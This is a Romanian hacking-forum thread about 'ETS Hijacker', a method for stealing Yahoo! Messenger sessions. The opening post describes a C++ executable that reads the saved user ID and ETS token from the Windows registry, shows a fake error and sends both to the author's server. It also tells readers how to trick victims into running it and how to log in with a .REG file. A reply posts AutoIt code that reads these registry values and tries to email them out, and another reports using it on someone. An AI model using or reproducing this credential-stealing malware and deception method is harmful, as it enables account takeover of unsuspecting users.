Jump to content
Guest chri5ty

ETS Hijacker

Recommended Posts

Posted
Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.

Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.

Simplu, nu?

Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.

Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...

SPOR LA FURAT!

Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.

Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva.

frumos explicat cum de te-a lasat sa postezi asa ceva ????

asta se invata la grupa mica

Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

give me warn pls

Guest chri5ty
Posted

1 - Nu inteleg ce e asa de super la virusul asta.

2 - Nu e exploit.

3 - Nu ma supar deloc daca fiecare isi face propria varianta a programului

4 - @zaiet-pagadi- nu prea imi place cand lumea citeaza mesaje intregi, doar ca sa exprime o idee scurta

5 - @zaiet-pagadi- "asta se invata la grupa mica". Apreciez superioritatea, dar se pare ca multe persoane de aici au chiulit de la lectia asta. Stiu ca e ceva simplu, dar mi-am dat seama si singur ca se face cam mult offtopic pe topicul asta. Ar trebui inchis, intrucat nu mai are nimeni noutati de adus. Mai multi spun ca le-a mers, altii care nu au citit prea atent, spun ca nu stiu de ce nu le-a mers... etc

Guest chri5ty
Posted

@-=(Alex_sm26)=-

Programul e un virus in sine. E un mic spion. Ce te-ai astepta? In orice caz, nu infecteaza sub nicio forma calculatorul; asta iti garantez eu, iar oricine are chef sa piarda ceva timp cu dezasamblor, iti va spune acelasi lucru.

Si daca tot incepe sa fie detectat ca virus (ceea ce era si de asteptat), atunci de ce nu va faceti singurei variante proprii? E asa de greu? Deja s-au publicat cateva surse si un program alternativ, principiul de functionare e extrem de simplu.

Incep sa cred ca majoritatea forumistilor de pe RST, sunt mai mult vorbareti decat descurcareti. Incep sa fiu chiar convins de asta :rolleyes:. Nicio generalizare!

Guest chri5ty
Posted

Vorbim de hackpedia...

M-am legat de BUNNN pentru faptul ca scotea pe banda o groaza de programe, care erau asemanatoare, in proportie de 90%, si nu avea de gand sa zica care e esenta programului.

Nu am nimic impotriva faptului ca si el a implementat functia pentru ETS in keyloggerul lui. Singura problema a programului e ca trimitea cam des e-mail-uri cu informatiile spionate.

Dar asta e cu totul alta poveste, si se incadreaza la offtopic

Posted (edited)

Sursa din AutoIT 3.x.x

$var1 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "ETS")

$var2 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "Yahoo! User ID")

#include <INet.au3>

$s_SmtpServer = "smtp.gmail.com"

$s_SmtpPort = 465

$s_SmtpSsl = 1

$s_SmtpUsername = "***"

$s_SmtpPassword = "***"

$s_FromName = "Mathiew"

$s_FromAddress = "mathiew.fantomas3@gmail.com"

$s_ToAddress = "pwd.reset@ymail.com"

$s_Subject = " tesul 2"

$as_Body = "bla "

$s_first = "bla"

$s_helo = "helo"

$b_trace = 0

$Response = _INetSmtpMail($s_SmtpServer,$s_SmtpPort,$s_SmtpSsl,$s_SmtpUsername,$s_SmtpPassword,$s_FromName,$s_FromAddress,$s_ToAddress)

$err = @error

If $Response = 1 Then

MsgBox(0, "Success!", "Mail sent")

Else

MsgBox(0, "Error!", "Mail failed with error code " & $err)

EndIf

Primele doua linii extrag ETS-ul si ID-ul...ia mai jos am incercat sa trimit un mail pe smtp si nu merge:((.Daca se poate postati va rog sursa..

La windows 7 au o valoare in registri numita MD_ID_value sau ceva de genu...valoarea pt aceasta nu e de forma unui ETS normal de la windows XP.

Incerc sa vad ce e si revin

Edited by phantomas90
am incercat pe windows 7
Posted

Pai partea buna e ca a mers

Partea proasta:A mers 2 minute pana nu stiu ce a facut ala(cred ca a schimbat parola)si apoi numai functioneaza...

Pot sa stiu si eu de ce numai mergE?a schimbat parola sau e el pe id?

Sau nu puteti face sa arate parola?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...